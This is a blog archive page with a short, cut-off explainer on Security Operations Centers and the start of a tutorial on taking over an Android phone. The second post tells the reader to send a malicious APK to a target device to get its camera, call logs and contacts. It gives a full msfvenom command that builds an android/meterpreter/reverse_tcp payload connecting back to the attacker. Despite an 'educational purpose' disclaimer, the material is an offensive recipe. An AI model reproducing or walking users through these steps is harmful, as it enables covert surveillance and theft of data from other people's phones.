
Showing posts from September, 2020

SOC: Security Operations Center

 A Security Operations Center (SOC) is a centralized unit that deals with security issues on an organizational and technical level. This is the definition of SOC. But wait did you get it?   Lets simplify it. You all know what "Hub" is...(You are reading a blog post on InfoSec Hub 🙇 )  A SOC acts like the hub. it continuously monitors organization's security posture while preventing, detecting ,analyzing and responding to cybersecurity incidents.         Main Work Done By SOC SOC monitors and analyze activity on networks,servers,endpoints and databases,applications and so on.   Establishing SOC  The first step in establishing an organization’s SOC is to clearly define a strategy that incorporates business-specific goals from various departments as well as input and support from executives. Plus infrastructure is required to support the strategy which is going to be implemented.   Benefits Of SOC Improvement in security incident detection Advantage for companies to defen

How to create a payload and access Android?

Try at your own risk. Only for educational purpose. First let us get the basics clear...   What is Payload? In computer networking and telecommunications, when a transmission unit is sent from the source to the destination, it contains both a header and the actual data to be transmitted. This actual data is called the payload . What we will do? We will access the android device by creating a payload.   What we will get? We will get the full control of the android device for ex camera snapshots, call logs, contact logs, apps installed in phone, system info etc. How we will do this?      With the help of Metasploit we will create an apk file ie.payload. Then we will send this apk file to target target device. After installing the file on target device we will get full control of the device. Lets Start... We will use Kali Linux for this purpose.  First create a payload root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk